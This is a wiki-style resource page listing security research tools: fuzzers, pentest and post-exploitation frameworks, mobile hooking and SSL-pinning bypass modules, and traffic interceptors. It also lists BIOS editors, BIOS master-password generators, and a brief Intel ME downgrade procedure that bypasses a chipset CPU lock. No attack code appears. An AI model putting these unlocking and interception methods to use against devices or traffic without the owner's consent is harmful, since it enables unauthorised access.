*[https://github.com/google/honggfuzz Honggfuzz] - Security oriented software fuzzer. Supports evolutionary, feedback-driven fuzzing based on code coverage (SW and HW based).&lt;br /&gt;
&lt;br /&gt;
*[https://llvm.org/docs/LibFuzzer.html LibFuzzer] - LibFuzzer is an in-process, coverage-guided, evolutionary fuzzing engine.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/AFL '''(ARCHIVED)''' AFL (American fuzzy lop)] - is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/AFLplusplus/AFLplusplus AFL++ (AFLplusplus)] - The fuzzer afl++ is afl with community patches, qemu 5.1 upgrade, collision-free coverage, enhanced laf-intel &amp;amp; redqueen, AFLfast++ power schedules, MOpt mutators, unicorn_mode, and a lot more!&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/carolemieux/afl-rb FairFuzz] - is a AFL extension to increase code coverage by targeting rare branches. FairFuzz has a particular advantage on programs with highly nested structure (packet analyzers, xmllint, programs compiled with laf-inte, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/RUB-SysSec/redqueen RedQueen] - is a fast general purpose fuzzer for x86 binary applications. It can automatically overcome checksums and magic bytes without falling back to complex and fragile program analysis techniques, such as symbolic execution.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sslab-gatech/qsym '''(ARCHIVED)''' QSYM] - ia a Practical Concolic Execution Engine Tailored for Hybrid Fuzzing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/puppet-meteor/MOpt-AFL MOpt-AFL] - is a AFL-based fuzzer that utilizes a customized Particle Swarm Optimization (PSO) algorithm to find the optimal selection probability distribution of operators with respect to fuzzing effectiveness. More details can be found in the technical report. The installation of MOpt-AFL is the same as AFL's.&lt;br /&gt;
&lt;br /&gt;
====PC platform exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/chipsec/chipsec Chipsec] - is a framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components. It includes a security test suite, tools for accessing various low level interfaces, and forensic capabilities.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rapid7/metasploit-framework Metasploit Framework] - is a Ruby-based Framework, modular penetration testing platform that enables you to write, test, and execute exploit code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BC-SECURITY/Empire Empire] - is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Arachni/arachni Arachni] - is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.&lt;br /&gt;
&lt;br /&gt;
*[https://portswigger.net/burp Burp Suite] - Burp or Burp Suite is a set of tools used for penetration testing of web applications.&lt;br /&gt;
&lt;br /&gt;
====Mobile exploration frameworks====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/MobSF/Mobile-Security-Framework-MobSF MobSF] - Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://frida.re/ Frida] - Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sensepost/objection objection] - is a runtime mobile exploration toolkit, powered by Frida, built to help you assess the security posture of your mobile applications, without needing a jailbreak.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/xtiankisutsa/MARA_Framework MARA] - is a Mobile Application RE and Analysis Framework. It is a toolkit that puts together commonly used mobile application RE and analysis tools to assist in testing mobile applications against the OWASP mobile security threats.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EntySec/SeaShell SeaShell] - is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mingyuan-xia/AppAudit AppAudit] - is an efficient program analysis tool that detects data leaks in mobile applications. It can accurately find all leaks within seconds and ~200 MB memory.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/canyie/pine Pine] - is a dynamic java method hook framework on ART runtime, which can intercept almost all java method calls in the current process.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPlant LSPlant] - is an Android ART hook library, providing Java method hook/unhook and inline deoptimization.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/LSPosed/LSPosed LSposed] - is a Riru / Zygisk module trying to provide an ART hooking framework which delivers consistent APIs with the OG Xposed, leveraging LSPlant hooking framework.&lt;br /&gt;
&lt;br /&gt;
::LSPosed Module Repository&lt;br /&gt;
:::*[https://github.com/Xposed-Modules-Repo Xposed Modules Repo] - New Xposed(LSPosed) Module Repository.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ElderDrivers/EdXposed Xposed Framework] - is a framework for mobile exploration hooking and modifying code on the fly. [https://binderfilter.github.io/xposed/ Inline API hooking example].&lt;br /&gt;
&lt;br /&gt;
::Xposed modules&lt;br /&gt;
:::*[https://github.com/Fuzion24/JustTrustMe JustTrustMe] - Art framework hook to patch okHTTP and other common libs to fool the CERT chain in order for Mitmproxy to capture TLS traffic in cleartext.&lt;br /&gt;
:::*[https://github.com/sanfengAndroid/FakeXposed FakeXposed] - Hide xposed, root, file redirection, two-way shielding data detection.&lt;br /&gt;
:::*[https://github.com/ac-pm/SSLUnpinning_Xposed/ SSLUnpinning_Xposed] - Android Xposed Module to bypass SSL certificate validation (Certificate Pinning)..&lt;br /&gt;
&lt;br /&gt;
::Xposed Framework API Development Documentation&lt;br /&gt;
:::*[https://api.xposed.info/reference/packages.html Xposed API Reference] - Javadoc reference of the Xposed Framework API. It's meant for module developers who want to understand which classes and methods they can use.&lt;br /&gt;
&lt;br /&gt;
====Network Inspection====&lt;br /&gt;
&lt;br /&gt;
=====Promiscuous mode eavesdropping TCP/UDP=====&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/mitmproxy/mitmproxy Mitmproxy] - is an interactive TLS-capable intercepting HTTP proxy for penetration testers and software developers.&lt;br /&gt;
&lt;br /&gt;
::*[https://gitlab.com/wireshark/wireshark Wireshark] - is a network traffic analyzer, or &amp;quot;sniffer&amp;quot;, for Linux, macOS, &amp;amp;#42;BSD and other Unix and Unix-like operating systems and for Windows.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/zaproxy/zaproxy Zed Attack Proxy (ZAP)] - is an Open Source &amp;amp; easy to use integrated penetration testing tool for finding vulnerabilities in web applications.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/SensePost/Mallet Mallet] - is an intercepting proxy for arbitrary protocols.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/Warxim/petep PETEP (PEnetration TEsting Proxy)] - is an open-source Java application for traffic analysis &amp;amp; modification using TCP/UDP proxies. PETEP is a useful tool for performing penetration tests of applications with various application protocols.&lt;br /&gt;
&lt;br /&gt;
=====HTTP(S) Debuggers / Web Debuggers=====&lt;br /&gt;
&lt;br /&gt;
::*[https://portswigger.net/burp Burp Suite] - is a proxy tool which helps to view, interact, modify web requests. Test, find, and exploit vulnerabilities faster with a complete suite of security testing tools.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.httpdebugger.com/ HTTP Debugger Pro] - is a network traffic analyzer tool that captures, displays, and analyzes HTTP and HTTPS traffic between a web browser or application and the internet for debugging and testing purposes.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/httptoolkit  HTTP Toolkit] - is a beautiful, cross-platform &amp;amp; open-source HTTP(S) debugging proxy, analyzer &amp;amp; client, with built-in support for modern tools from Docker to Android to GraphQL.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/jbittel/httpry httpry] - is a HTTP logging and information retrieval tool written in Perl and C.&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/requestly/requestly Requestly] - Bring the power of Charles Proxy, Fiddler &amp;amp; Postman together with beautiful, modern UI &amp;amp; collaboration features.&lt;br /&gt;
&lt;br /&gt;
::*[https://telerik-fiddler.s3.amazonaws.com/fiddler/FiddlerSetup.exe Fiddler] - is a Web Debugger is a serviceable web debugging proxy for logging all HTTP(S) traffic linking your computer and the internet, allowing for traffic inspection, breakpoint setting, and more.&lt;br /&gt;
&lt;br /&gt;
=====Other Network Tools=====&lt;br /&gt;
&lt;br /&gt;
::*[https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview tcpview] - is a tool that will enumerate all active TCP and UDP endpoints, resolving all IP addresses to their domain name versions (Windows).&lt;br /&gt;
&lt;br /&gt;
::*[https://www.nirsoft.net/utils/cports.html cports] - is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local Windows computer.&lt;br /&gt;
&lt;br /&gt;
::*[https://www.netresec.com/?page=NetworkMinerSourceCode NetworkMiner] - is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.&lt;br /&gt;
&lt;br /&gt;
::*[https://linux.die.net/man/8/netstat netstat] - is a Linux CLI tool to print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====BIOS (basic input/output system) firmware modifying software====&lt;br /&gt;
Unified Extensible Firmware Interface (UEFI) &amp;amp; legacy computer BIOS (basic input/output system) firmware modifying software.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====UEFI=====&lt;br /&gt;
::*[https://github.com/LongSoft/UEFITool UEFITool / UEFIExtract / UEFIFind] - is a UEFI firmware image viewer and editor.&lt;br /&gt;
::*[https://github.com/LongSoft/IFRExtractor-RS IFRExtractor-RS] - is a Rust utility to extract UEFI IFR (Internal Form Representation) data found in a binary file into human-readable text.&lt;br /&gt;
::*[https://github.com/theopolis/uefi-firmware-parser uefi-firmware-parser] - is a cross-platform open source application written in Python. Very tinker-friendly. Can be used in scripts to automate firmware patching.&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.01_x64.exe AMIBCP_5.01_x64] - AMI BIOS Configuration Program (AMIBCP) is a powerful customization utility that enables OEMs/ODMs to customize the Aptio® ROM image without intervening on the source code. [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b VT link]&lt;br /&gt;
::*[https://github.com/tylernguyen/razer15-hackintosh/blob/master/tools/AMIBCP64/AMIBCP64.exe AMIBCP 5.01.0014 x64] [https://www.virustotal.com/gui/file/58f822028c24bb452e4c0af60118b3db2a492d91dbf477960ac4f595cfded91b/details VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0023.exe AMIBCP_5.02.0023] [https://www.virustotal.com/gui/file/38f7c54098af1544ddba6324e6d1fea6d1462f422ba021f309ad4445dacd0467 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_5.02.0031.exe AMIBCP_5.02.0031] [https://www.virustotal.com/gui/file/c7ade67fe0e8f4c22f73ce3168ff6e718086f1eda83cce4c065b4fe49bd5ad99 VT link]&lt;br /&gt;
::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP%205.02.0034.exe AMIBCP 5.02.0034] [https://www.virustotal.com/gui/file/7fe28fb8a7419c95fba428891e5b3914d9e2b365a5a8932da74db52a1c1dabd8 VT link]&lt;br /&gt;
::*[https://github.com/datasone/grub-mod-setup_var grub-mod-setup_var] - a modified grub allowing tweaking hidden BIOS settings. Does not work with newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o because of SMM protection or variable locking.&lt;br /&gt;
::*[https://github.com/JamesAmiTw/ru-uefi RU.EFI] - is a UEFI app that allows users to examine and modify UEFI variables within a system's BIOS while the system is running. It's essentially a tool for interacting with and altering firmware settings, and is often used for tasks like unlocking hidden BIOS settings or debugging firmware-related issues. Crashes on newer (2012 &amp;amp; &amp;gt;&amp;gt;) InsydeH2o upon loading from EFI shell possibly because of violating BIOS runtime security policies.&lt;br /&gt;
&lt;br /&gt;
=====BIOS (legacy)=====&lt;br /&gt;
::*[https://forums.mydigitallife.net/threads/tool-to-insert-replace-slic-in-phoenix-insyde-dell-efi-bioses.13194 PhoenixTool] - is a Windows-only freeware GUI application written in C#. Used mostly for SLIC-related modifications, but it not limited to this task. Requires Microsoft .NET 3.5 to work properly. Supports unpacking firmware images from various vendor-specific formats like encrypted HP update files and Dell installers.&lt;br /&gt;
:::'''AMI'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.25.zip AMIBCP_2.25] [https://www.virustotal.com/gui/file/71050f3db40cc6c0a623d66c8eeb05d0a0818226fd11ed787452f4f540d45204 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_2.43.zip AMIBCP_2.43] [https://www.virustotal.com/gui/file/efa10cfe5f78c16982abf458eb50a4fde152631ad3b77838bd2013a763045ced VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.13.exe AMIBCP_3.13] [https://www.virustotal.com/gui/file/e0a5b1059f04813e72c6d4fa639d32567002fdd86321895b5987224a4518896e VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.37.exe AMIBCP_3.37] [https://www.virustotal.com/gui/file/1174e177b28fb7ecbac6c5043a9e8d78ff4756f657ea72369c5fb6b43b1f2623 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.46.exe AMIBCP_3.46] [https://www.virustotal.com/gui/file/84bd5b151286d4181ef26284d96ca49074e18574b8454c51cb0b34013ee5d073 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.47.exe AMIBCP_3.47] [https://www.virustotal.com/gui/file/20d93c6f868d4638676b7cde2c66c5589433c1480250aa0d774c4feef3337507 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_3.51.exe AMIBCP_3.51] [https://www.virustotal.com/gui/file/0d630b4b9c34d6c7132249a1a7bc3de33b39779fc90d9a367272cf57b4621aed VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.53.exe AMIBCP_4.53] [https://www.virustotal.com/gui/file/3f90e402dab9f64cbc4514e18bc2625ec7672da806cd9e0ef2e803b0ce104a01 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/AMIBCP/AMIBCP_4.55.exe AMIBCP_4.55] [https://www.virustotal.com/gui/file/451ad821a66e9ea89ee0544ce53cfab887dc0bb662a2de95f0e1aa1663dc6e06 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_2.22.1.exe MMTOOL_2.22.1] - MMtool stands for Module Management Tool. As one of AMI's BIOS/UEFI utilities, MMTool allows users to manage firmware file modules within the Aptio ROM image. [https://www.virustotal.com/gui/file/cf49f1e742f5cce68152f3c17df29e5c9aa7fb557c432402199159ffda44e007 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.12.exe MMTOOL_3.12] [https://www.virustotal.com/gui/file/78c3ca427878be5b07058f422914027462d3ac740b0de247169cc0aee4195e3b VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOl_3.19.exe MMTOOl_3.19] [https://www.virustotal.com/gui/file/b4b30c6ff911f18d3383b094628f59aa5ec3b109acd12aaef391acf9720e52af VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.19_Mod_21FiX.exe MMTOOL_3.19_Mod_21FiX] [https://www.virustotal.com/gui/file/66e2717fcac67b073d24916c74bc8d8dd7932b188d20b8b635b511e6195d5855 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22.EXE MMTOOL_3.22] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_1B_21Fix-BKMOD.EXE MMTOOL_3.22_1B_21Fix-BKMOD] [https://www.virustotal.com/gui/file/5616a62d2b50a53490bb705b769ed86bf4b49799663a814fcd1284ebc0bdc62f VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.22_CN_BKMod.exe MMTOOL_3.22_CN_BKMod] [https://www.virustotal.com/gui/file/f467d75962278a4e01d646cdf8008136912d8a1ddd588c45e2fcee9d7cd17140 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.23_CN_BKMod.exe MMTOOL_3.23_CN_BKMod] [https://www.virustotal.com/gui/file/9bf846d023312c889069b03f5ab7157e270fc67c5d295e745d0a5f27d12a71de VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_3.26.exe MMTOOL_3.26] [https://www.virustotal.com/gui/file/c5a64ea7ce2bea8556fa81e0069adbba793181bfaa76f59f4f472f0a471bac98 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_4.50.0.23.exe MMTOOL_4.50.0.23][https://www.virustotal.com/gui/file/7d0377a72e67e5a71400361416452440826832aeb2c9bebaa578e8af962eaafd VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.0.07.exe MMTOOL_5.0.07] [https://www.virustotal.com/gui/file/28049163fd1e3423c42b229a5f6ed877f14e7caf3b794bf7efb970b375e6ff41 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0024.exe MMTOOL_5.02.0024] [https://www.virustotal.com/gui/file/bbc3e75905997ddc05c523e57a72e49bbfcaf84dca64e460f10f8553b7fda9ee VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/AMI/MMTOOL/MMTOOL_5.02.0025.exe MMTOOL_5.02.0025] [https://www.virustotal.com/gui/file/5d05d0bbea720d4b73dc66db55031c2659458696b9f143df3b7e2f43040289cc VT link]&lt;br /&gt;
:::'''Award'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/tree/main/Award_Bios_Editor Award Bios Editor] - is a editor for Award bios.&lt;br /&gt;
:::'''InsydeH2O'''&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.02.13.zip H2OEZE_x86_WIN_100.00.02.13] - H2OEZE™: Easy BIOS Editor that helps edit binaries in the BIOS, including Option ROMs, driver binaries, logos, and Setup values. [https://www.virustotal.com/gui/file/9660f1bf9436b258ec5ad857a94fbd0ec1f8fbff8ab22ca1dfcfb5ebbdcedf08 VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x86/H2OEZE_x86_WIN_100.00.03.04.zip H2OEZE_x86_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/2a1005803da854693502093445906eb2cccb24947d6828bc1533ba3603c73b0a VT link]&lt;br /&gt;
:::*[https://github.com/direstraits96/BIOS-MOD-TOOLS/blob/main/Insyde/H2OEZE/x64/H2OEZE_x64_WIN_100.00.03.04.rar H2OEZE_x64_WIN_100.00.03.04]  [https://www.virustotal.com/gui/file/20d2d0336d30afd0b1961eb42dc061ce66a6fcfbfba1530e7abd9be883dcb45c VT link]&lt;br /&gt;
:::'''Phoenix'''&lt;br /&gt;
:::*[[Media:PhoenixBiosEditor2.2.13.zip]] (pw: recessim.com [https://www.virustotal.com/gui/file/3abf75ea7386f3dc24156bf6175a940867b8c742246cb8bf257fe5fc0b1cf9b5 VT link]) - is a software tool used to view and modify the settings and structure of Phoenix BIOS firmware images dating from between 2004 and 2008.&lt;br /&gt;
&lt;br /&gt;
:Download all* the above tools in one archive, [https://github.com/direstraits96/BIOS-MOD-TOOLS/archive/refs/heads/main.zip click here]. [https://www.virustotal.com/gui/file/d8a75883ca8d292adcf40e5ed88584579b1c0c69f6ad5837fc56747233c56f9c VT link]&lt;br /&gt;
&lt;br /&gt;
:::'''Tool collections'''&lt;br /&gt;
:::*[http://xdel.ru/downloads/bios-mods.com-tools/ bios-mods.com tools (2016)] - is a collection of bios modifying and flashing tools.&lt;br /&gt;
&lt;br /&gt;
:::'''Microcode Extraction Tool'''&lt;br /&gt;
:::*[https://github.com/platomav/MCExtractor MCExtractor] - is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc.&lt;br /&gt;
&lt;br /&gt;
:Bios password resetting&lt;br /&gt;
::*[https://archive.org/details/hp-bios-reset-mazzif HP BIOS Password Reset by MAZZIF] [https://www.virustotal.com/gui/file/9ddd094edc286f2cb8d63158d226986d9a0c184ca450580dfaf9754005df9d41 VT link] - A live USB tool made by Mazzif to reset older HP Probook and Elitebook BIOS passwords.&lt;br /&gt;
&lt;br /&gt;
::*[[Media:Fujitsu bios unlock.zip|pwgen-fsi-6x4dec.py]] [https://www.virustotal.com/gui/file/3a43ba7c88f1f10576728ea291b3097c048f842eee30dda3121280c049c61b8a VT link] pwgen-fsi-6x4dec.py - is a python command-line utility for generating master unlock password for older Fujitsu notebooks. Tested on: E557, FH570, Q616, U728, T731, E734, U745, S752, E756&lt;br /&gt;
&lt;br /&gt;
::*[https://github.com/dogbert/bios-pwgen/tree/master bios-pwgen] - BIOS Master Password Generators for older laptops [http://dogber1.blogspot.com/2009/05/table-of-reverse-engineered-bios.html blogpost] (dell, asus, fsi6x4, fxi-hex hpmini, insyde, samsung, sony-4x4, sony-serial).&lt;br /&gt;
&lt;br /&gt;
::*[[Media:AMITSEDecrypt.zip]] [https://www.virustotal.com/gui/file/2b03ef2292863bd94dc6ce0f10412f27ec5abf95f1e3aca2d34dd3712fd45d12 VT link] - AMI supervisor password decoder called &amp;quot;AMITSEDecrypt&amp;quot; to decode them with the XOR key. Works on older AMI firmware images is able to recover supervisor password if set.&lt;br /&gt;
&lt;br /&gt;
::*[https://bios-pw.org/ BIOS Master Password Generator (bios-pw.org)] - is a website that provides default or master BIOS unlock passwords for various laptop brands based on the system-generated hash or code displayed after too many failed BIOS password attempts.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====HM70 PCH chipset Bypass Unsupported CPU=====&lt;br /&gt;
:Machine shuts down after 30 minutes if a '''&amp;quot;unsupported CPU&amp;quot;''' (Intel Core i3, i5 or i7) is installed in a notebook using the HM70 chipset.&amp;lt;br&amp;gt;&lt;br /&gt;
:The HM70 is aimed at entry-level laptops and budget-conscious consumers, and therefore is locked to [https://www.cpu-upgrade.com/mb-Intel_(chipsets)/HM70_Express.html support only dual core Pentium and Celeron CPUs..]&amp;lt;br&amp;gt;&lt;br /&gt;
:Intel has restricted this chipset in the firmware to shut down after 30 minutes if users attempt to upgrade their entry-level laptops.&lt;br /&gt;
::[[File:Hm70.png|none|thumb|200px|Intel HM70 PCH chipset. CPUs supported: Intel Pentium &amp;amp; Intel Celerons. [https://www.intel.com/content/www/us/en/products/sku/67419/mobile-intel-hm70-express-chipset/compatible.html Intel source]]]&lt;br /&gt;
&lt;br /&gt;
======Intel Management Engine Firmware Downgrade Attack======&lt;br /&gt;
&lt;br /&gt;
::First analyze the firmware after you have made a back-up. Make note of the Intel ME version.&lt;br /&gt;
::Then download the Intel ME version just below the firmware version you try to downgrade.&lt;br /&gt;
::Fire up your hex editor search in your bios blob for '''&amp;quot;0x24, 0x46, 0x50, 0x54, 0x0F, 0x00, 0x00, 0x00, 0x20&amp;quot;''' Intel ME 1.5M blob will start ascii text '''&amp;quot;$FPT&amp;quot;'''.&lt;br /&gt;
::Replace that entire section with the new downgraded Intel ME 1.5m blob. Before flashing make sure Me Analyzer recognises the change. Flash the modification and test it.&lt;br /&gt;
::If you don't see the ME version change with Me Analyzer first try to make note of the offset the Intel ME blob is at and then run it through me_cleaner before injecting a older one.&lt;br /&gt;
&lt;br /&gt;
::This downgrade attack &amp;lt;u&amp;gt;successfully bypassed&amp;lt;/u&amp;gt; the 30 minute shutdown restriction timer.&lt;br /&gt;
&lt;br /&gt;
:'''Required tools''':&lt;br /&gt;
::*[[Software_Tools#Hex_Editors|Hex Editor.]]&lt;br /&gt;
::*[https://github.com/platomav/MEAnalyzer Me Analyzer] - Intel Engine &amp;amp; Graphics Firmware Analysis Tool.&lt;br /&gt;
::*[https://github.com/corna/me_cleaner me_cleaner] - Tool for partial deblobbing of Intel ME/TXE firmware images.&lt;br /&gt;
::*[https://winraid.level1techs.com/t/intel-conv-sec-management-engine-drivers-firmware-and-tools-2-15/30719 Intel (Converged Security) Management Engine: Drivers, Firmware and Tools for (CS)ME 2-15] - Useful resource.&lt;br /&gt;
::*[https://mega.nz/folder/2Q0klQpA#6o04nlV_4xqfx76tjvgi4g (CS)ME Firmware Archive.]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Operating Systems====&lt;br /&gt;
Below are categories of operating systems used for various purposes, including binary reverse engineering, local software analysis, and wireless penetration testing with SDR for RF signal analysis.&lt;br /&gt;
=====Mostly X86-64=====&lt;br /&gt;
======Penetration Testing &amp;amp; Digital Forensics======&lt;br /&gt;
*[https://www.kali.org/ Kali Linux] - is an open-source, Debian-based Linux distribution geared towards various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.backbox.org/ BlackBox] is more than an operating system, it is a Free Open Source Community Project with the aim of promoting the culture of security in IT environment and give its contribution to make it better and safer.&lt;br /&gt;
&lt;br /&gt;
*[https://blackarch.org/ BlackArch] - is an Arch Linux-based penetration testing distribution for penetration testers and security researchers.&lt;br /&gt;
&lt;br /&gt;
*[https://www.parrotsec.org/ Parrot Security] - is based on top of Debian, the most advanced and recognized universal operating system that can run anywhere.&lt;br /&gt;
&lt;br /&gt;
*[https://labs.fedoraproject.org/security/ Fedora Security Spin] - is a live media based on Fedora to provide a safe test environment for working on security auditing, forensics and penetration testing, coupled with all the Fedora Security features and tools.&lt;br /&gt;
&lt;br /&gt;
*[https://www.caine-live.net/ CAINE] - CAINE (Computer Aided INvestigative Environment) is an Italian GNU/Linux live distribution created as a Digital Forensics project.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/dracos-linux Dracos Linux] - is the Linux operating system from Indonesia, open source is built based on Debian live project under the protection of the GNU General Public License v3.0. This operating system is one variant of Linux distributions, which is used to perform security testing (penetration testing). Dracos linux in Arm by hundreds hydraulic pentest, forensics and reverse engineering.&lt;br /&gt;
&lt;br /&gt;
*[https://www.pentoo.ch/ Pentoo] - is a Live CD and Live USB designed for penetration testing and security assessment. Based off Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd.&lt;br /&gt;
&lt;br /&gt;
======RF Signals Analysis OS [RISC SBC &amp;amp; X86-64]======&lt;br /&gt;
*[https://cemaxecuter.com/ DragonOS] - Out of the box OS for SDRs. Supports Raspberry Pi and x86-64.&lt;br /&gt;
&lt;br /&gt;
======Privacy Operating System======&lt;br /&gt;
*[https://tails.net/ Tails] - is a portable operating system that protects against surveillance and censorship.&lt;br /&gt;
*[https://www.qubes-os.org/ Qubes OS] - is a security-focused operating system that uses virtualization to isolate applications and tasks into separate compartments (called qubes), protecting the system even if one part gets compromised.&lt;br /&gt;
*[https://www.whonix.org/ Whonix] is a privacy-focused Linux distribution that routes all internet traffic through the Tor network using a two-part system of an isolated gateway and a workstation to provide strong anonymity and security.&lt;br /&gt;
&lt;br /&gt;
======Windows 10 IoT LTSC======&lt;br /&gt;
*[https://rentry.co/LTSC LTSC IoT Windows 10 debloat &amp;amp; setup guide] [[Media:LTSC.pdf]] - Useful when you want a clean debloated Windows 10 virtual machine. The IoT LTSC channel receives security updates until Jan 13, 2032. &lt;br /&gt;
&lt;br /&gt;
*[https://rentry.org/fwt2 fwt2] [[Media:Fwt2.pdf]] - Read the /fwt/ paste for a more general overview of Windows.&lt;br /&gt;
&lt;br /&gt;
======Previous Windows versions======&lt;br /&gt;
*[https://hackandpwn.com/windows-7-esu-patching/ Windows 7 ESU Patching] - Information about the minimum set of updates needed for Windows 7 latest ESU hotfixes/patches.&lt;br /&gt;
&lt;br /&gt;
=====Embedded Devices [Network equipment]=====&lt;br /&gt;
&lt;br /&gt;
